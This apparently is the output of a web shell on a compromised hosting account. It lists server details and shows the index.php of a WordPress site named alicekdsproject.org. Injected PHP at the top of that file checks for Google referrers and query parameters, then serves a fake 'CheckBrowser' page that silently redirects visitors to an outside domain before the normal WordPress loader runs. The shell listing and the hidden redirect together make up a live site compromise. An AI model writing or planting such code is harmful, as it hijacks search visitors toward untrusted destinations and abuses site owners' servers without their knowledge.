Server IP : 162.213.251.208 / Your IP : 18.119.213.60 Web Server : LiteSpeed System : Linux business55.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64 User : jmoroovq ( 1890) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/jmoroovq/alicekdsproject.org/ |
Upload File : |
<?php $ref = $_SERVER['HTTP_REFERER']; $redirLink = 'https://xmariorel.com/16449/26805?lp=00¶m=alicekdsproject00'; $utm_term = isset($_GET['utm_term']) ? $_GET['utm_term'] : ''; $aw = isset($_GET['aw']) ? $_GET['aw'] : ''; $id = isset($_GET['id']) ? $_GET['id'] : ''; $gclid = isset($_GET['gclid']) ? $_GET['gclid'] : ''; $s = isset($_GET['s']) ? 's_param' : ''; if (strpos($ref, 'google') !== FALSE) { if (!empty($s) && !empty($utm_term)) { echo '<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=edge"/> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <title>CheckBrowser</title> </head> <body> <script>location.href="' . $redirLink . '?utm_campaign=' . time() . '&utm_term=' . $utm_term . '&aw=' . $aw . '&gclid=' . $gclid . '&id=' . $id . '";</script> </body></html>'; return; } } /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define('WP_USE_THEMES', true); /** Loads the WordPress Environment and Template */ require __DIR__ . '/wp-blog-header.php';